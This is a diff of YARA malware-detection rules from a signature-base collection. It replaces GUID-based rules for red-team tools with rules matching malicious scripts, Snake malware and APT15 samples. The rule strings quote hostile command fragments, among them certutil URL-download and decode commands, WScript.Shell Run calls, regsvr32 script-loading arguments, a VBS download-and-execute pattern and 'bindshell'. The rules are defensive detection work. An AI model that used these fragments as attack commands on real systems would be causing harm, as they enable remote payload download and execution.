-		$typelibguid0lo = "0547ff40-5255-42a2-beb7-2ff0dbf7d3ba" ascii wide
-		$typelibguid0up = "0547FF40-5255-42A2-BEB7-2FF0DBF7D3BA" ascii wide
+		$x1 = "j\"+\"a\"+\"v\"+\"a\"+\"s\"+\"c\"+\"r\"+\"i\"+\"p\"+\"t\""
+		$x2 = "script:https://www.dropbox.com" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Addreferencedotredteam : FILE
+rule SIGNATURE_BASE_JS_Suspicious_MSHTA_Bypass
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "59299a72-9b7a-5108-81c2-d8f6d2e99b20"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/ceramicskate0/AddReferenceDotRedTeam"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1917-L1931"
+		description = "Detects MSHTA Bypass"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b2ddca78-c19a-5bb6-a1c9-4413e637ab1d"
+		date = "2017-07-19"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/ItsReallyNick/status/887705105239343104"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_scripts.yar#L35-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "34717e4864a7dc5c21525be09fcfe87da6b18e56b1956e5a34b0a669d8d6ab45"
-		score = 75
+		logic_hash = "df68cac0da19c5705353f26fc3f2a99556b7230f9d4f52e7a2e35cb48997b699"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "73c79d7e-17d4-46c9-be5a-ecef65b924e4" ascii wide
-		$typelibguid0up = "73C79D7E-17D4-46C9-BE5A-ECEF65B924E4" ascii wide
+		$s1 = "mshtml,RunHTMLApplication" ascii
+		$s2 = "new ActiveXObject(\"WScript.Shell\").Run(" ascii
+		$s3 = "/c start mshta j" ascii nocase
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Lime_Crypter : FILE
+rule SIGNATURE_BASE_Javascript_Run_Suspicious
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "484c7a15-7ab2-57d3-848c-0fddff753d52"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/NYAN-x-CAT/Lime-Crypter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1933-L1947"
+		description = "Detects a suspicious Javascript Run command"
+		author = "Florian Roth (Nextron Systems)"
+		id = "87f98ead-3052-5777-8877-574619173aaa"
+		date = "2017-08-23"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/craiu/status/900314063560998912"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_scripts.yar#L52-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "45a47b8ed17b157e22e6819f08a245aca2930d276b52d781fbbc82bcfb184ab4"
-		score = 75
+		logic_hash = "39d2292d3749c63780dc7ca7a2414ba02e2b0e1edec7ec6a16b42aba2c44c23a"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "f93c99ed-28c9-48c5-bb90-dd98f18285a6" ascii wide
-		$typelibguid0up = "F93C99ED-28C9-48C5-BB90-DD98F18285A6" ascii wide
+		$s1 = "w = new ActiveXObject(" ascii
+		$s2 = " w.Run(r);" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-
-rule SIGNATURE_BASE_HKTL_NET_GUID_Browserghost : FILE
+rule SIGNATURE_BASE_Certutil_Decode_OR_Download : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "adcc5d12-c393-5708-ae0b-a85f2187c881"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/QAX-A-Team/BrowserGhost"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1949-L1965"
+		description = "Certutil Decode"
+		author = "Florian Roth (Nextron Systems)"
+		id = "63bdefd2-225a-56d5-b615-5e236c97f050"
+		date = "2017-08-29"
+		modified = "2023-10-19"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_scripts.yar#L70-L93"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1f9bdf4881a71c429cf20e7a635f054a4a340f335767cb22ecc8024bcc57e53b"
-		score = 75
+		logic_hash = "5640dcfedc028cc40b0376d328758b504eb1ff860da94648b435eadb760d9724"
+		score = 40
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "2133c634-4139-466e-8983-9a23ec99e01b" ascii wide
-		$typelibguid0up = "2133C634-4139-466E-8983-9A23EC99E01B" ascii wide
+		$a1 = "certutil -decode " ascii wide
+		$a2 = "certutil  -decode " ascii wide
+		$a3 = "certutil.exe -decode " ascii wide
+		$a4 = "certutil.exe  -decode " ascii wide
+		$a5 = "certutil -urlcache -split -f http" ascii wide
+		$a6 = "certutil.exe -urlcache -split -f http" ascii wide
+		$fp_msi = { 52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them and not pe.is_dll ( )
+		filesize < 700KB and 1 of ( $a* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpshot : FILE
+rule SIGNATURE_BASE_Suspicious_JS_Script_Content : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9d59cd53-53b1-57db-b391-eee4dd6feec0"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/tothi/SharpShot"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1967-L1981"
+		description = "Detects suspicious statements in JavaScript files"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6a547aa5-c58c-5559-9d3f-3f0d541eafd4"
+		date = "2017-12-02"
+		modified = "2023-12-05"
+		reference = "Research on Leviathan https://goo.gl/MZ7dRg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_scripts.yar#L95-L112"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "843e7bb327314749a58e3d44356fcd9d7a2c349cb429f5bc593044894f17a15c"
-		score = 75
+		logic_hash = "1dbc1a266d710a70a77c81d5b872d0d324423250a9f34455faef53ac4c41b5f2"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fc0fad39b461eb1cfc6be57932993fcea94fca650564271d1b74dd850c81602f"
 
 	strings:
-		$typelibguid0lo = "057aef75-861b-4e4b-a372-cfbd8322c8e1" ascii wide
-		$typelibguid0up = "057AEF75-861B-4E4B-A372-CFBD8322C8E1" ascii wide
+		$x1 = "new ActiveXObject('WScript.Shell')).Run('cmd /c " ascii
+		$x2 = ".Run('regsvr32 /s /u /i:" ascii
+		$x3 = "new ActiveXObject('WScript.Shell')).Run('regsvr32 /s" fullword ascii
+		$x4 = "args='/s /u /i:" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( filesize < 10KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Offensive__NET : FILE
+rule SIGNATURE_BASE_Universal_Exploit_Strings : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b98495fb-0338-5042-a7ce-d117204eb91e"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/mrjamiebowman/Offensive-.NET"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1983-L1997"
+		description = "Detects a group of strings often used in exploit codes"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4b3a9eec-5f7c-579c-9719-fe23cc291aee"
+		date = "2017-12-02"
+		modified = "2023-12-05"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_scripts.yar#L114-L131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c26d29934fe3f7575ce1cd56bcf2571e95d5705bccdb1ca211ca7d46765d0fb4"
-		score = 75
+		logic_hash = "6436a1cf6d0acc3162ec99c95ef20b3e6dd110c77d5a0b26ac790551316c0a69"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9b07dacf8a45218ede6d64327c38478640ff17d0f1e525bd392c002e49fe3629"
 
 	strings:
-		$typelibguid0lo = "11fe5fae-b7c1-484a-b162-d5578a802c9c" ascii wide
-		$typelibguid0up = "11FE5FAE-B7C1-484A-B162-D5578A802C9C" ascii wide
+		$s1 = "Exploit" fullword ascii
+		$s2 = "Payload" fullword ascii
+		$s3 = "CVE-201" ascii
+		$s4 = "bindshell"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( filesize < 2KB and 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Ruralbishop : FILE
+rule SIGNATURE_BASE_VBS_Obfuscated_Mal_Feb18_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8fd89465-1ecc-5eda-b2ab-273172ad945d"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/rasta-mouse/RuralBishop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1999-L2013"
+		description = "Detects malicious obfuscated VBS observed in February 2018"
+		author = "Florian Roth (Nextron Systems)"
+		id = "39ea10e5-9dea-5cc8-8388-15378fcbab60"
+		date = "2018-02-12"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/zPsn83"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_scripts.yar#L133-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ee349395cbb2c692afcbdd0a6bce52d19762ec45b64cca684b60b148a1edd2d5"
+		logic_hash = "0bbd388a3103744df2434956c2b7ac12dacd72f9041b4cc014d31eec4115aedd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "06960cb721609fe5a857fe9ca3696a84baba88d06c20920370ddba1b0952a8ab"
+		hash2 = "c5c0e28093e133d03c3806da0061a35776eed47d351e817709d2235b95d3a036"
+		hash3 = "e1765a2b10e2ff10235762b9c65e9f5a4b3b47d292933f1a710e241fe0417a74"
 
 	strings:
-		$typelibguid0lo = "fe4414d9-1d7e-4eeb-b781-d278fe7a5619" ascii wide
-		$typelibguid0up = "FE4414D9-1D7E-4EEB-B781-D278FE7A5619" ascii wide
+		$x1 = "A( Array( (1* 2^1 )+" ascii
+		$x2 = ".addcode(A( Array(" ascii
+		$x3 = "false:AA.send:Execute(AA.responsetext):end" ascii
+		$x4 = "& A( Array(  (1* 2^1 )+" ascii
+		$s1 = ".SYSTEMTYPE:NEXT:IF (UCASE(" ascii
+		$s2 = "A = STR:next:end function" ascii
+		$s3 = "&WSCRIPT.SCRIPTFULLNAME&CHR" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 600KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Deviceguardbypasses : FILE
+rule SIGNATURE_BASE_APT_MAL_RU_WIN_Snake_Malware_May23_1 : MEMORY
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3790faac-b5be-5999-b35f-71a2ef02b6ed"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/tyranid/DeviceGuardBypasses"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2015-L2039"
+		description = "Hunting Russian Intelligence Snake Malware"
+		author = "Matt Suiche (Magnet Forensics)"
+		id = "53d2de3c-350c-5090-84bb-b6cde16a80ad"
+		date = "2023-05-10"
+		modified = "2025-03-21"
+		reference = "https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mal_ru_snake_may23.yar#L17-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b9fcec2e6641e961f2007dd1de1822fd0e0bcf9614fdd9e1110ac4fd40a89fd8"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "7cff7152259bb17a9b72b91f0fbef220aad2f35a1d2758d7225316a9896bf845"
+		score = 70
+		quality = 71
+		tags = "MEMORY"
+		threat_name = "Windows.Malware.Snake"
+		scan_context = "memory"
+		license = "MIT"
 
 	strings:
-		$typelibguid0lo = "f318466d-d310-49ad-a967-67efbba29898" ascii wide
-		$typelibguid0up = "F318466D-D310-49AD-A967-67EFBBA29898" ascii wide
-		$typelibguid1lo = "3705800f-1424-465b-937d-586e3a622a4f" ascii wide
-		$typelibguid1up = "3705800F-1424-465B-937D-586E3A622A4F" ascii wide
-		$typelibguid2lo = "256607c2-4126-4272-a2fa-a1ffc0a734f0" ascii wide
-		$typelibguid2up = "256607C2-4126-4272-A2FA-A1FFC0A734F0" ascii wide
-		$typelibguid3lo = "4e6ceea1-f266-401c-b832-f91432d46f42" ascii wide
-		$typelibguid3up = "4E6CEEA1-F266-401C-B832-F91432D46F42" ascii wide
-		$typelibguid4lo = "1e6e9b03-dd5f-4047-b386-af7a7904f884" ascii wide
-		$typelibguid4up = "1E6E9B03-DD5F-4047-B386-AF7A7904F884" ascii wide
-		$typelibguid5lo = "d85e3601-0421-4efa-a479-f3370c0498fd" ascii wide
-		$typelibguid5up = "D85E3601-0421-4EFA-A479-F3370C0498FD" ascii wide
+		$a = { 25 73 23 31 }
+		$b = { 25 73 23 32 }
+		$c = { 25 73 23 33 }
+		$d = { 25 73 23 34 }
+		$e = { 2e 74 6d 70 }
+		$g = { 2e 73 61 76 }
+		$h = { 2e 75 70 64 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_AMSI_Handler : FILE
+rule SIGNATURE_BASE_APT_MAL_RU_Snake_Indicators_May23_1
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "40768acf-fa9e-531a-83fd-187814ddc2d4"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/two06/AMSI_Handler"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2041-L2061"
+		description = "Detects indicators found in Snake malware samples"
+		author = "Florian Roth"
+		id = "0d4fa8a7-447c-5905-bab9-b63de6209036"
+		date = "2023-05-10"
+		modified = "2025-03-21"
+		reference = "https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mal_ru_snake_may23.yar#L45-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cebfce69d60ca00e3d824bb75b36efc0c53b695c502a39601dee1e418af52766"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "cb7a4ad2ee0868f17b6235f070e4c03e2394e3c252253f334b29ad26116b09e5"
+		score = 85
+		quality = 35
+		tags = ""
+		hash1 = "10b854d66240d9ee1ce4296d2f7857d2b1c6f062ca836d13d777930d678b3ca6"
+		hash2 = "15ac5a61fb3e751045de2d7f5ff26c673f3883e326cd1b3a63889984a4fb2a8f"
+		hash3 = "315ec991709eb45eccf724dfe31bccb7affcac7f8e8007e688ba8d02827205e0"
+		hash4 = "417eb4fb9ada270af35562ff317807ac5ca9ee26181fe89990858f0944d3a6a7"
+		hash5 = "48112970de6ea0f925f0657b30adcd0723df94afc98cfafdc991d70ad3602119"
+		hash6 = "55ea557bcf4c143f20c616abe9075f7faafbf825aeef9ddb4f2b201acc44414b"
+		hash7 = "6568bbeeb417e1111bf284e73152d90fe17e5497da7630ccddcbc666730dccef"
+		hash8 = "81d620cb645006ffc9ac1b9d98a53aa286ae92b025bda075962079633f020482"
+		hash9 = "888a3029b1b8b664eb1fc77dd511c4088a1e28ae5535a8683642bb3dca011d00"
+		hash10 = "9027b4fef50b36289d630059425dc1137c88328329c3ea9dbc348dccd001adc0"
+		hash11 = "9ac199572cab67433726976a0e9ba39d6feed1d567d6d230ebe3133df8dcb7fa"
+		hash12 = "a64e5d872421991226ee040b4cd49a89ca681bdef4c10c4798b6c7b5c832c6df"
+		hash13 = "b5d2da5eb57b5ab26edb927469552629f3cf43bbce2b1a128f6daac7cf57f6f7"
+		hash14 = "bc15de1d1c6c62c0bf856e0368adabc4941e7b687a969912494c173233e6d28d"
+		hash15 = "bdf94311313c39a3413464f623bd75a3db2eb05cc01090acd6dcd462a605eb4a"
+		hash16 = "e4311892ae00bf8148a94fa900fc8e2c279a2acd3b4b4b4c3d0c99dd1d32353c"
+		hash17 = "ed74288b367a93c6b47343bc696e751b9c465761ce9c4208901726baa758b234"
+		hash18 = "ef1f1c7692b92a730f76b6227643b2d02a6e353af6e930166e3b48e3903e4ffd"
+		hash19 = "f5e982b76af7f447742753f0b57eec3d7dd2e3c8e5506c35d4cf6c860b829f45"
 
 	strings:
-		$typelibguid0lo = "d829426c-986c-40a4-8ee2-58d14e090ef2" ascii wide
-		$typelibguid0up = "D829426C-986C-40A4-8EE2-58D14E090EF2" ascii wide
-		$typelibguid1lo = "86652418-5605-43fd-98b5-859828b072be" ascii wide
-		$typelibguid1up = "86652418-5605-43FD-98B5-859828B072BE" ascii wide
-		$typelibguid2lo = "1043649f-18e1-41c4-ae8d-ac4d9a86c2fc" ascii wide
-		$typelibguid2up = "1043649F-18E1-41C4-AE8D-AC4D9A86C2FC" ascii wide
-		$typelibguid3lo = "1d920b03-c537-4659-9a8c-09fb1d615e98" ascii wide
-		$typelibguid3up = "1D920B03-C537-4659-9A8C-09FB1D615E98" ascii wide
+		$s1 = "\\\\.\\%s\\\\" ascii fullword
+		$s2 = "read_peer_nfo" ascii fullword
+		$s3 = "rcv_buf=%d%c" ascii fullword
+		$s4 = "%s: (0x%08x)" ascii fullword
+		$s5 = "no_impersonate" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_RAT_Telegramspybot : FILE
+rule SIGNATURE_BASE_EXT_SUSP_OBFUSC_Macos_Roothelper_Obfuscated : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "57d22201-a051-5040-927c-30da3fc684fd"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/SebastianEPH/RAT.TelegramSpyBot"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2063-L2077"
+		description = "Yara for the public tool 'roothelper'. Used by XCSSET (https://gist.github.com/NullArray/f39b026b9e0d19f1e17390a244d679ec)"
+		author = "im0prtp3"
+		id = "7ff91c00-8178-525c-bb41-d09cf7cda588"
+		date = "2021-06-07"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/imp0rtp3/status/1401912205621202944"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_hktl_roothelper.yar#L2-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ed661d6513df3a3e8558912f96f86bff55214f9ba6426085af8458a5c9c62d1f"
-		score = 75
-		quality = 85
+		logic_hash = "2121de0409f3f8e4c4e079944efb605776e0475cadc25607eb888cc6461ecaf3"
+		score = 65
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "8653fa88-9655-440e-b534-26c3c760a0d3" ascii wide
-		$typelibguid0up = "8653FA88-9655-440E-B534-26C3C760A0D3" ascii wide
+		$a1 = "E: neither argv[0] nor $_ works." fullword
+		$b1 = "shll=%s\n" fullword
+		$b2 = "argv[%d]=%.60s\n" fullword
+		$b3 = "getenv(%s)=%s\n" fullword
+		$b4 = "argc=%d\n" fullword
+		$b5 = "argv=<null>\n" fullword
+		$c1 = "%s%s%s: %s\n" fullword
+		$c2 = "x%lx" fullword
+		$c3 = "=%lu %d" fullword
+		$c4 = "%lu %d%c" fullword
+		$f1 = "rmarg"
+		$f2 = "chkenv"
+		$f3 = "untraceable"
+		$f4 = "arc4"
+		$f6 = "stte"
+		$f7 = "with_file"
+		$opcodes_1 = { 99 F7 7D ?? 4C 63 C2 42 0F B6 14 01 0F B6 3D }
+		$opcodes_2 = { C6 [3] 00 00 00 C6 [3] 00 00 00 C6 [3] 00 00 00 8A 05 [2] 00 00 0F B6 [3] 00 00 89 CA }
+		$opcodes_3 = { E8 [2] FF FF	8B 85 ?? F? FF FF 2B 85 ?? F? FF FF	83 ?? 01 89 85 ?? F? FF FF E9 ?? 00 00 00 }
+		$weak_opcodes_1 = {48 8B 45 ?? 48 8B 00 48 3B 45 ??	0F 95 C1 88 4D ??}
+		$weak_opcodes_2 = {	48 8B 45 ??	48 83 38 ??	0F 95 C1 88 4D ?? }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca ) and ( $a1 or 3 of ( $b* ) or 5 of ( $f* ) or all of ( $opcodes* ) or ( 2 of ( $b* ) and ( 2 of ( $c* ) or 2 of ( $opcodes* ) ) ) or ( 3 of ( $c* ) and 4 of ( $f* ) ) or ( 2 of ( $opcodes* ) and ( all of ( $weak_opcodes* ) or 3 of ( $c* ) ) ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Thehacktoolboxteek : FILE
+rule SIGNATURE_BASE_APT15_Malware_Mar18_Royalcli : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ad8cf2c8-f70e-5f46-92fa-46e1fa5e683c"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/teeknofil/TheHackToolBoxTeek"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2079-L2105"
+		description = "Detects malware from APT 15 report by NCC Group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "165bfa6c-1a8d-5628-8c35-da4e4a2ae04f"
+		date = "2018-03-10"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/HZ5XMN"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L13-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "08ffcdc2d2f7ae3325208dc4980b8f44505fc1fcf40a7a926ac5a0c97977a1d3"
+		logic_hash = "27fb5e8ff299201d1d13f4a45c401570f76ddfa4c3c1153eff50187170ada06e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6df9b712ff56009810c4000a0ad47e41b7a6183b69416251e060b5c80cd05785"
 
 	strings:
-		$typelibguid0lo = "2aa8c254-b3b3-469c-b0c9-dcbe1dd101c0" ascii wide
-		$typelibguid0up = "2AA8C254-B3B3-469C-B0C9-DCBE1DD101C0" ascii wide
-		$typelibguid1lo = "afeff505-14c1-4ecf-b714-abac4fbd48e7" ascii wide
-		$typelibguid1up = "AFEFF505-14C1-4ECF-B714-ABAC4FBD48E7" ascii wide
-		$typelibguid2lo = "4cf42167-a5cf-4b2d-85b4-8e764c08d6b3" ascii wide
-		$typelibguid2up = "4CF42167-A5CF-4B2D-85B4-8E764C08D6B3" ascii wide
-		$typelibguid3lo = "118a90b7-598a-4cfc-859e-8013c8b9339c" ascii wide
-		$typelibguid3up = "118A90B7-598A-4CFC-859E-8013C8B9339C" ascii wide
-		$typelibguid4lo = "3075dd9a-4283-4d38-a25e-9f9845e5adcb" ascii wide
-		$typelibguid4up = "3075DD9A-4283-4D38-A25E-9F9845E5ADCB" ascii wide
-		$typelibguid5lo = "295655e8-2348-4700-9ebc-aa57df54887e" ascii wide
-		$typelibguid5up = "295655E8-2348-4700-9EBC-AA57DF54887E" ascii wide
-		$typelibguid6lo = "74efe601-9a93-46c3-932e-b80ab6570e42" ascii wide
-		$typelibguid6up = "74EFE601-9A93-46C3-932E-B80AB6570E42" ascii wide
+		$s1 = "\\Release\\RoyalCli.pdb" ascii
+		$s2 = "%snewcmd.exe" fullword ascii
+		$s3 = "Run cmd error %d" fullword ascii
+		$s4 = "%s~clitemp%08x.ini" fullword ascii
+		$s5 = "run file failed" fullword ascii
+		$s6 = "Cmd timeout %d" fullword ascii
+		$s7 = "2 %s  %d 0 %d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Usbtrojan : FILE
+
+rule SIGNATURE_BASE_APT15_Malware_Mar18_Royaldns : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d25c9033-13e8-5fc9-8561-f8862cca39b8"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/mashed-potatoes/USBTrojan"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2107-L2121"
+		description = "Detects malware from APT 15 report by NCC Group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c2f519db-2750-53ce-ae18-697ea041faaf"
+		date = "2018-03-10"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/HZ5XMN"
